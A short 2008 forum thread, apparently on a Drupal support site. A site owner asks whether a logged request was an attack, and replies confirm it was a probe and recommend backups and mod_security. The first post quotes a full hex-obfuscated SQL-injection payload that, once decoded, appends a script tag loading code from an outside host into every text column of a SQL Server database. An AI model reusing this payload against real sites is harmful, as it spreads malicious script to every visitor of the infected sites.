Was this a hacking attempt?
A few anonymous users with different IP addresses headed to my site with the following:
?q=node/16\';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
Was this a hacking attempt?
=-=
someone or something looking for an exploit, yes.
Is my site safe?
Is my site safe?
=-=
I assume, because you didn't state, that the anon user got a page not found ?
have you pasted that path in to see what happens ?
It's software, your site is as safe and as secure as possible until the next exploit is found. That said, make frequent backs up of your DB and files.
Log
Here is the log
Type page not found
Date Wednesday, July 23, 2008 - 12:59
User Anonymous
Location (link in first post)
Referrer
Message (same as link)
Severity warning
Hostname (will not post IP)
Operations
=-=
I believe you hold the answer to your own question.
The path was a page not found.
Use Mod_Security
Use Mod_Security, an Apache module. The module blocks the "GET" request and Drupal never receives it. This looks a botnet, I'm getting hit from IPs worldwide.